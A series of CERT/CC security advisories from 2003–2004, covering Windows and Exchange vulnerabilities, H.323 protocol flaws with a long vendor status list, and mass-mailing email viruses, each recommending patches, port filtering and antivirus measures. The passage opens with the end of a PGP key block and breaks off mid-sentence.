iQCVAwUgP05dyTpmH2w9K/0VAQE2GgP+K+OXttj6D0N9MydzZI4bHxMTwb1t0EkX
mlaIVv435ibthRDtghOw6VV/zq51YAtAhJdxjqftQatq42ohLrBygrIUXqftJlMP
X46fNbqAL2up5LNti6uNEMvTKw/G82FjVkQPo5S9ZYYikzw7BcNsMpneCEal1MBK
TAgVsKwd6Tu0KENFUlQgQ29vcmRpbmF0aW9uIENlbnRlciA8Y2VydEBjZXJ0Lm9y
Zz6JAJUDBRA/Tg4vOmYfbD0r/RUBAd/XA/9USS5+CV5em4ooQpOcEw7d/3MqmVRj
7UnibXhJK1T7Hf1ttEQUiiDuC1Awmu7w9hTD4A+4fSbKulvrLrLr2M1KiT9bVWt5
90RptGmgnLPuhjgusEJNdF9lp9c9xVn69BqfIxvHcHtnW5FO4E4or+p/ASJGqGUI
vFEExAI6ZvvDIJkAjQM/jKH+AYABBAC9NCzLIR4o5hjIggPpu9VY83d5HYqUR10c
uz6ZrykGybhyuVFl2dDyNVtKfX/lDbqzBM2EomgBmmohgrxSbhzyNFULWGoHXgG7
H65OJ+Et9DVgYY4VskCHJ1exMS2aQPkji56VOt6AOy1L8v3PmVsZ/W2Xl75IwA+W
djTU/3VQFQAFEbQoQ0VSVCBDb29yZGluYXRpb24gQ2VudGVyIDxjZXJ0QGNlcnQu
b3JnPokAlQMFED+Mof6WdjTU/3VQFQEB5j8D/R6otQdfaMuVmcnj88IElauyFi7N
v34MdqqEHP9q/SH5FfBQBAw63zixPpWd/zG7TcnwIswvf3HhA9o8rCgW6aGaWVWo
NTkwL90JaMWEZxtT+JLP1qQ1TMb/PSndFIyAQH6b0x4uKtI8PASsOczo0TLHlODh
KTJ6Jyz9HUuzc6X4iEYEEBECAAYFAj+NS0wACgkQXYr3tqcKhGMLBQCgv6+7Q/9o
18vixI92Jkm298yZEVcAoKjPdBVmrM6T6CzvoHW9DO73EErsiEYEEBECAAYFAj+N
S18ACgkQHWlMw1Rb3MQVgwCgzJldauEoDW1DvZqrYdwdyFcsPlwAnRm4zB5/NSnk
UJQFBqXYs2f1P6PEiEwEExECAAwFAj+NT3wFgwH5koIACgkQSQjoesB49NKWwQCd
F71rr7dhNElR1o2sP6TP3fyGzVYAn2NYpp94oK/VX92dAHOG7QRlhdSD
=+mNV
-----END PGP PUBLIC KEY BLOCK-----

Date: Thu, 16 Oct 2003 16:02:03 -0400
From: CERT Advisory
To: cert-advisory@cert.org
Subject: CERT Advisory CA-2003-27 Multiple Vulnerabilities in Microsoft Windows and Exchange

CERT Advisory CA-2003-27 Multiple Vulnerabilities in Microsoft Windows and Exchange

Original issue date: October 16, 2003
Last revised: --
Source: CERT/CC

A complete revision history is at the end of this file.

Systems Affected

* Multiple versions of Microsoft Windows (ME, NT 4.0, NT 4.0 TSE, 2000, XP, Server 2003)
* Microsoft Exchange Server 5.5 and Microsoft Exchange Server 2000

Overview

There are multiple vulnerabilities in Microsoft Windows and Microsoft Exchange, the most serious of which could allow remote attackers to execute arbitrary code.

I. Description

There are a number of vulnerabilities in Microsoft Windows and Microsoft Exchange that could allow an attacker to gain administrative control of a vulnerable system. The most serious of these vulnerabilities allow an unauthenticated, remote attacker to execute arbitrary code with no action required on the part of the victim. For detailed information, see the following vulnerability notes:

VU#575892 - Buffer overflow in Microsoft Windows Messenger Service

There is a buffer overflow in the Messenger service on most recent versions of Microsoft Windows that could allow an attacker to execute arbitrary code. (Other resources: MS03-043, CAN-2003-0717)

VU#422156 - Microsoft Exchange Server fails to properly handle specially crafted SMTP extended verb requests

Microsoft Exchange fails to handle certain SMTP extended verbs correctly. In Exchange 5.5, this can lead to a denial-of-service condition. In Exchange 2000, this could permit an attacker to run arbitrary code. (Other resources: MS03-046, CAN-2003-0714)

In addition, several other vulnerabilities may permit an attacker to execute arbitrary code if the attacker can convince the victim to take some specific action (e.g., viewing a web page or an HTML email message). For detailed information, see the following vulnerability notes:

VU#467036 - Microsoft Windows Help and Support Center contains buffer overflow in code used to handle HCP protocol

There is a buffer overflow in the Microsoft Windows Help and Support Center that could permit an attacker to execute arbitrary code with SYSTEM privileges. (Other resources: MS03-044, CAN-2003-0711)

VU#989932 - Microsoft Windows contains buffer overflow in Local Troubleshooter ActiveX control (Tshoot.ocx)

Microsoft Windows ships with a troubleshooting application to assist users with problems. A vulnerability in this application may permit a remote attacker to execute arbitrary code with the privileges of the current user.
(Other resources: MS03-042)

VU#838572 - Microsoft Windows Authenticode mechanism installs ActiveX controls without prompting user

A vulnerability in Microsoft's Authenticode could allow a remote attacker to install an untrusted ActiveX control on the victim's system. The ActiveX control could run code of the attacker's choice. (Other resources: MS03-041, CAN-2003-0660)

VU#435444 - Microsoft Outlook Web Access (OWA) contains cross-site scripting vulnerability in the "Compose New Message" form

There is a cross-site scripting vulnerability in Microsoft Outlook Web Access. (Other resources: MS03-047, CAN-2003-0712)

Finally, there is a vulnerability in ListBox and ComboBox controls that could allow a local user to gain elevated privileges. For detailed information, see

VU#967668 - Microsoft Windows ListBox and ComboBox controls vulnerable to buffer overflow when supplied crafted Windows message

There is a buffer overflow in a function called by the Microsoft Windows ListBox and ComboBox controls that could allow a local attacker to execute arbitrary code with privileges of the process hosting the controls. (Other resources: MS03-045, CAN-2003-0659)

II. Impact

The impact of these vulnerabilities ranges from denial of service to the ability to execute arbitrary code.

III. Solution

Disable the Messenger Service

For VU#575892, Microsoft recommends first disabling the Messenger service and then evaluating the need to apply the patch. If the Messenger service is not required, leave it in the disabled state. Apply the patch to make sure that systems are protected, especially if the Messenger service is re-enabled. Instructions for disabling the Messenger service can be found in VU#575892 and MS03-043.

Apply patches

Microsoft has provided patches for these problems. Details can be found in the relevant Microsoft Security Bulletins. For many home users, the simplest way to obtain these patches will be by running Windows Update.

Appendix A. Vendor Information

This appendix contains information provided by vendors. When vendors report new information, this section is updated, and the changes are noted in the revision history. If a vendor is not listed below, we have not received their authenticated, direct statement. Further vendor information is available in the Systems Affected sections of the vulnerability notes listed above.

Microsoft Corporation

Please see the following Microsoft Security Bulletins: MS03-041, MS03-042, MS03-043, MS03-044, MS03-045, MS03-046, and MS03-047.

Appendix B. References

* CERT/CC Vulnerability Note VU#575892 -
* CERT/CC Vulnerability Note VU#422156 -
* CERT/CC Vulnerability Note VU#467036 -
* CERT/CC Vulnerability Note VU#989932 -
* CERT/CC Vulnerability Note VU#838572 -
* CERT/CC Vulnerability Note VU#435444 -
* CERT/CC Vulnerability Note VU#967668 -
* Microsoft Security Bulletin MS03-041 -
* Microsoft Security Bulletin MS03-042 -
* Microsoft Security Bulletin MS03-043 -
* Microsoft Security Bulletin MS03-044 -
* Microsoft Security Bulletin MS03-045 -
* Microsoft Security Bulletin MS03-046 -
* Microsoft Security Bulletin MS03-047 -

_________________________________________________________________

Our thanks to Microsoft Corporation for the information contained in their security bulletins. Microsoft has credited the following people for their help in discovering and responding to these issues: Greg Jones of KPMG UK and Cesar Cerrudo, The Last Stage of Delirium Research Group, David Litchfield of Next Generation Security Software Ltd., Brett Moore of Security-Assessment.com, Joao Gouveia, and Ory Segal of Sanctum Inc.

_________________________________________________________________

Feedback can be directed to the authors, Shawn V. Hernan and Art Manion.
______________________________________________________________________

This document is available from:

______________________________________________________________________

CERT/CC Contact Information

Email:
Phone: +1 412-268-7090 (24-hour hotline)
Fax: +1 412-268-6989
Postal address:
  CERT Coordination Center
  Software Engineering Institute
  Carnegie Mellon University
  Pittsburgh PA 15213-3890
  U.S.A.

CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends.

Using encryption

  We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from

  If you prefer to use DES, please call the CERT hotline for more information.

Getting security information

  CERT publications and other security information are available from our web site

  To subscribe to the CERT mailing list for advisories and bulletins, send email to . Please include in the body of your message

  subscribe cert-advisory

* "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office.

______________________________________________________________________

NO WARRANTY

Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement.

______________________________________________________________________

Conditions for use, disclaimers, and sponsorship information

Copyright 2003 Carnegie Mellon University.
Revision History

  October 16, 2003: Initial release

______________________________________________________________________

From: CERT Advisory
To: cert-advisory@cert.org
Date: Wed, 14 Jan 2004 10:44:43 -0500
Organization: CERT(R) Coordination Center - +1 412-268-7090
Subject: CERT Advisory CA-2004-01 Multiple H.323 Message Vulnerabilities

CERT Advisory CA-2004-01 Multiple H.323 Message Vulnerabilities

Original release date: January 13, 2004
Last revised: --
Source: CERT/CC, NISCC

A complete revision history can be found at the end of
this file.

Systems Affected

  * Many software and hardware systems that implement the H.323 protocol. Examples include
    + Voice over Internet Protocol (VoIP) devices and software
    + Video conferencing equipment and software
    + Session Initiation Protocol (SIP) devices and software
    + Media Gateway Control Protocol (MGCP) devices and software
    + Other networking equipment that may process H.323 traffic (e.g., routers and firewalls)

Overview

A number of vulnerabilities have been discovered in various implementations of the multimedia telephony protocol H.323. Voice over Internet Protocol (VoIP) and video conferencing equipment and software can use these protocols to communicate over a variety of computer networks.

I. Description

The U.K. National Infrastructure Security Co-ordination Centre (NISCC) has reported multiple vulnerabilities in different vendor implementations of the multimedia telephony protocol H.323.

H.323 is an international standard protocol, published by the International Telecommunications Union, used to facilitate communication among telephony and multimedia systems. Examples of such systems include VoIP, video-conferencing equipment, and network devices that manage H.323 traffic.

A test suite developed by NISCC and the University of Oulu Security Programming Group (OUSPG) has exposed multiple vulnerabilities in a variety of implementations of the H.323 protocol (specifically its connection setup sub-protocol H.225.0).

Information about individual vendor H.323 implementations is available in the Vendor Information section below, and in the Vendor Information section of NISCC Vulnerability Advisory 006489/H323.

The U.K. National Infrastructure Security Co-ordination Centre is tracking these vulnerabilities as NISCC/006489/H.323. The CERT/CC is tracking this issue as VU#749342. This reference number corresponds to CVE candidate CAN-2003-0819, as referenced in Microsoft Security Bulletin MS04-001.

II. Impact

Exploitation of these vulnerabilities may result in the execution of arbitrary code or cause a denial of service, which in some cases may require a system reboot.

III. Solution

Apply a patch or upgrade

  Appendix A and the Systems Affected section of Vulnerability Note VU#749342 contain information provided by vendors for this advisory (). However, as vendors report new information to the CERT/CC, we will only update VU#749342. If a particular vendor is not listed, we have not received their comments. Please contact your vendor directly.

Filter network traffic

  Sites are encouraged to apply network packet filters to block access to the H.323 services at network borders. This can minimize the potential of denial-of-service attacks originating from outside the perimeter. The specific services that should be filtered include

    * 1720/TCP
    * 1720/UDP

  If access cannot be filtered at the network perimeter, the CERT/CC recommends limiting access to only those external hosts that require H.323 for normal operation. As a general rule, filtering all types of network traffic that are not required for normal operation is recommended.

  It is important to note that some firewalls process H.323 packets and may themselves be vulnerable to attack. As noted in some vendor recommendations like Cisco Security Advisory 20040113-h323 and Microsoft Security Bulletin MS04-001, certain sites may actually want to disable application layer inspection of H.323 network packets.

  Protecting your infrastructure against these vulnerabilities may require careful coordination among application, computer, network, and telephony administrators. You may have to make tradeoffs between security and functionality until vulnerable products can be updated.

Appendix A. - Vendor Information

This appendix contains information provided by vendors for this advisory.
Please see the Systems Affected section of Vulnerability Note VU#749342 and the Vendor Information section of NISCC Vulnerability Advisory 006489/H323 for the latest information regarding the response of the vendor community to this issue.

3Com
  No statement is currently available from the vendor regarding this vulnerability.

Alcatel
  No statement is currently available from the vendor regarding this vulnerability.

Apple Computer Inc.
  Apple: Not Vulnerable. Mac OS X and Mac OS X Server do not contain the issue described in this note.

AT&T
  No statement is currently available from the vendor regarding this vulnerability.

Avaya
  Please see the NISCC Vulnerability Advisory 006489/H323 at http://www.uniras.gov.uk/vuls/2004/006489/h323.htm

Borderware
  No statement is currently available from the vendor regarding this vulnerability.

Check Point
  No statement is currently available from the vendor regarding this vulnerability.

BSDI
  No statement is currently available from the vendor regarding this vulnerability.

Cisco Systems Inc.
  Please see http://www.cisco.com/warp/public/707/cisco-sa-20040113-h323.shtml

Clavister
  No statement is currently available from the vendor regarding this vulnerability.

Computer Associates
  No statement is currently available from the vendor regarding this vulnerability.

Cyberguard
  Please see the NISCC Vulnerability Advisory 006489/H323 at http://www.uniras.gov.uk/vuls/2004/006489/h323.htm

Debian
  No statement is currently available from the vendor regarding this vulnerability.

D-Link Systems
  No statement is currently available from the vendor regarding this vulnerability.

Conectiva
  No statement is currently available from the vendor regarding this vulnerability.

EMC Corporation
  No statement is currently available from the vendor regarding this vulnerability.

Engarde
  No statement is currently available from the vendor regarding this vulnerability.

eSoft
  We don't have an H.323 implementation and thus aren't affected by this.

Extreme Networks
  No statement is currently available from the vendor regarding this vulnerability.

F5 Networks
  No statement is currently available from the vendor regarding this vulnerability.

Foundry Networks Inc.
  No statement is currently available from the vendor regarding this vulnerability.

FreeBSD
  No statement is currently available from the vendor regarding this vulnerability.

Fujitsu
  Please see the NISCC Vulnerability Advisory 006489/H323 at http://www.uniras.gov.uk/vuls/2004/006489/h323.htm

Global Technology Associates
  No statement is currently available from the vendor regarding this vulnerability.

Hitachi
  Please see the NISCC Vulnerability Advisory 006489/H323 at http://www.uniras.gov.uk/vuls/2004/006489/h323.htm

Hewlett-Packard Company
  Please see the NISCC Vulnerability Advisory 006489/H323 at http://www.uniras.gov.uk/vuls/2004/006489/h323.htm

Ingrian Networks
  No statement is currently available from the vendor regarding this vulnerability.

Intel
  No statement is currently available from the vendor regarding this vulnerability.

Intoto
  No statement is currently available from the vendor regarding this vulnerability.

Juniper Networks
  No statement is currently available from the vendor regarding this vulnerability.

Lachman
  No statement is currently available from the vendor regarding this vulnerability.

Linksys
  No statement is currently available from the vendor regarding this vulnerability.

Lotus Software
  No statement is currently available from the vendor regarding this vulnerability.

Lucent Technologies
  Please see the NISCC Vulnerability Advisory 006489/H323 at http://www.uniras.gov.uk/vuls/2004/006489/h323.htm

Microsoft Corporation
  Please see http://www.microsoft.com/technet/security/bulletin/MS04-001.asp

MontaVista Software
  No statement is currently available from the vendor regarding this vulnerability.

MandrakeSoft
  No statement is currently available from the vendor regarding this vulnerability.

Multi-Tech Systems Inc.
  No statement is currently available from the vendor regarding this vulnerability.

NEC Corporation
  No statement is currently available from the vendor regarding this vulnerability.

NetBSD
  NetBSD does not ship any H.323 implementations as part of the Operating System. There are a number of third-party implementations available in the pkgsrc system. As these products are found to be vulnerable, or updated, the packages will be updated accordingly. The audit-packages mechanism can be used to check for known-vulnerable package versions.

Netfilter
  No statement is currently available from the vendor regarding this vulnerability.

NetScreen
  No statement is currently available from the vendor regarding this vulnerability.

Network Appliance
  No statement is currently available from the vendor regarding this vulnerability.

Nokia
  No statement is currently available from the vendor regarding this vulnerability.

Nortel Networks
  The following Nortel Networks Generally Available products and solutions are potentially affected by the vulnerabilities identified in NISCC Vulnerability Advisory 006489/H323 and CERT VU#749342:

  Business Communications Manager (BCM) (all versions) is potentially affected; more information is available in Product Advisory Alert No. PAA 2003-0392-Global.

  Succession 1000 IP Trunk and IP Peer Networking, and 802.11 Wireless IP Gateway are potentially affected; more information is available in Product Advisory Alert No. PAA-2003-0465-Global.

  For more information please contact
    North America: 1-800-4NORTEL or 1-800-466-7835
    Europe, Middle East and Africa: 00800 8008 9009, or +44 (0) 870 907 9009
  Contacts for other regions are available at http://www.nortelnetworks.com/help/contact/global/
  Or visit the eService portal at http://www.nortelnetworks.com/cs under Advanced Search. If you are a channel partner, more information can be found under http://www.nortelnetworks.com/pic under Advanced Search.

Novell
  No statement is currently available from the vendor regarding this vulnerability.

Objective Systems Inc.
  Please see the NISCC Vulnerability Advisory 006489/H323 at http://www.uniras.gov.uk/vuls/2004/006489/h323.htm

OpenBSD
  No statement is currently available from the vendor regarding this vulnerability.

Openwall GNU/*/Linux
  No statement is currently available from the vendor regarding this vulnerability.

RadVision
  Please see the NISCC Vulnerability Advisory 006489/H323 at http://www.uniras.gov.uk/vuls/2004/006489/h323.htm

Red Hat Inc.
  Please see the NISCC Vulnerability Advisory 006489/H323 at http://www.uniras.gov.uk/vuls/2004/006489/h323.htm

Oracle Corporation
  No statement is currently available from the vendor regarding this vulnerability.

Riverstone Networks
  No statement is currently available from the vendor regarding this vulnerability.

Secure Computing Corporation
  No statement is currently available from the vendor regarding this vulnerability.

SecureWorks
  No statement is currently available from the vendor regarding this vulnerability.

Sequent
  No statement is currently available from the vendor regarding this vulnerability.

Sony Corporation
  No statement is currently available from the vendor regarding this vulnerability.

Stonesoft
  No statement is currently available from the vendor regarding this vulnerability.

Sun Microsystems Inc.
  Sun SNMP does not provide support for H.323, so we are not vulnerable. And so far we have not found any bundled products that are affected by this vulnerability. We are also actively investigating our unbundled products to see if they are affected. Updates will be provided to this statement as they become available.

SuSE Inc.
  No statement is currently available from the vendor regarding this vulnerability.

Symantec Corporation
  Please see the NISCC Vulnerability Advisory 006489/H323 at http://www.uniras.gov.uk/vuls/2004/006489/h323.htm

Unisys
  No statement is currently available from the vendor regarding this vulnerability.

TandBerg
  Please see the NISCC Vulnerability Advisory 006489/H323 at http://www.uniras.gov.uk/vuls/2004/006489/h323.htm

Tumbleweed Communications Corp.
  Please see the NISCC Vulnerability Advisory 006489/H323 at http://www.uniras.gov.uk/vuls/2004/006489/h323.htm

TurboLinux
  No statement is currently available from the vendor regarding this vulnerability.

uniGone
  Please see the NISCC Vulnerability Advisory 006489/H323 at http://www.uniras.gov.uk/vuls/2004/006489/h323.htm

WatchGuard
  No statement is currently available from the vendor regarding this vulnerability.

Wirex
  No statement is currently available from the vendor regarding this vulnerability.

Wind River Systems Inc.
  No statement is currently available from the vendor regarding this vulnerability.

Xerox
  No statement is currently available from the vendor regarding this vulnerability.

ZyXEL
  No statement is currently available from the vendor regarding this vulnerability.

_________________________________________________________________

The CERT Coordination Center thanks the NISCC Vulnerability Management Team and the University of Oulu Security Programming Group (OUSPG) for coordinating the discovery and release of the technical details of this issue.

_________________________________________________________________

Feedback may be directed to the authors: Jeffrey S. Havrilla, Mindi J. McDowell, Shawn V. Hernan and Jason A. Rafail

______________________________________________________________________

This document is available from: http://www.cert.org/advisories/CA-2004-01.html

______________________________________________________________________

CERT/CC Contact Information

Email: cert@cert.org
Phone: +1 412-268-7090 (24-hour hotline)
Fax: +1 412-268-6989
Postal address:
  CERT Coordination Center
  Software Engineering Institute
  Carnegie Mellon University
  Pittsburgh PA 15213-3890
  U.S.A.
Using encryption

  We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key

Getting security information

  CERT publications and other security information are available from our web site http://www.cert.org/

  To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message

  subscribe cert-advisory

______________________________________________________________________

Conditions for use, disclaimers, and sponsorship information

Copyright 2004 Carnegie Mellon University.
Revision History

  January 13, 2004: Initial release

______________________________________________________________________

From: CERT Advisory
To: cert-advisory@cert.org
Date: Tue, 27 Jan 2004 12:29:10 -0500
Organization: CERT(R) Coordination Center - +1 412-268-7090
Subject: CERT Advisory CA-2004-02 Email-borne Viruses

CERT Advisory CA-2004-02 Email-borne Viruses

Original release date: January 27, 2004
Last revised: --
Source: CERT/CC

A complete revision history can be found at the end of this file.

Systems Affected

  * Any system running Microsoft Windows (all versions from Windows 95 and up) and used for reading email or accessing peer-to-peer file sharing services.

Overview

In recent weeks there have been several mass-mailing viruses released on the Internet.
It is important for users to understand the risks posed by these pieces of malicious code and the steps necessary to protect their systems from virus infection.

I. Description

Over the past week, we have seen two more mass-mailing viruses, W32/Bagle and W32/Novarg, impact a significant number of home users and sites. The technology used in these viruses is not significantly different from prior mass-mailing viruses such as W32/Sobig and W32/Mimail. Unsolicited email messages containing attachments are sent to unsuspecting recipients. They may contain a return address, a provocative envelope, or something else that encourages its receiver to open it. This technique is called social engineering. Because we are trusting and curious, social engineering is often effective. The widespread impact of these latest viruses, which rely on human intervention to spread, demonstrates the effectiveness of social engineering.

It continues to be important to ensure that anti-virus software is used and updated regularly, that attachments are examined on mail servers, and that firewalls filter unneeded ports and protocols. It also remains necessary that users be educated about the dangers of opening attachments, especially executable attachments.

  CERT Incident Note IN-2004-01 - W32/Novarg
  http://www.cert.org/incident_notes/IN-2004-01.html

  CERT Incident Note IN-2003-03 - W32/Sobig.F
  http://www.cert.org/incident_notes/IN-2003-03.html

  CERT Incident Note IN-2003-02 - W32/Mimail
  http://www.cert.org/incident_notes/IN-2003-02.html

II. Impact

A virus infection can have significant consequences on your computer system. These consequences include, but are not limited to:

  * Information disclosure - Mass-mailing viruses typically harvest email addresses from the addressbooks or files found on an infected system. Some viruses will also attempt to send files from an infected host to other potential victims or even back to the virus author. These files may contain sensitive information.
  * Add/Modify/Delete files - Once a system is compromised, a virus could potentially add, modify or delete arbitrary files on the system. These files may contain personal information or be required for the proper operation of the computer system.

  * Affect system stability - Viruses can consume significant amounts of computer resources causing a system to run slowly or be rendered unusable.

  * Install a backdoor - Many viruses will install a backdoor on an infected system. This backdoor may be used by a remote attacker to gain access to the system, or view/add/modify/delete files on the system. These backdoors may also be leveraged to download and control additional tools for use in distributed denial-of-service (DDoS) attacks against other sites.

  * Attack other systems - Systems infected by viruses are frequently used to attack other systems. These attacks frequently involve attempts to exploit vulnerabilities on the remote systems or denial-of-service attacks that utilize a high volume of network traffic.

  * Send unsolicited bulk email (spam) to other users - There have been numerous reports of spammers leveraging compromised systems to send unsolicited bulk email. Frequently these compromised systems are poorly protected end user computers (e.g., home and small business systems).

III. Solution

In addition to following the steps outlined in this section, the CERT/CC encourages home users to review the "Home Network Security" and "Home Computer Security" documents.

  Home Network Security
  http://www.cert.org/tech_tips/home_networks.html

  Home Computer Security
  http://www.cert.org/homeusers/HomeComputerSecurity/

Run and maintain an anti-virus product

  While an up-to-date antivirus software package cannot protect against all malicious code, for most users it remains the best first l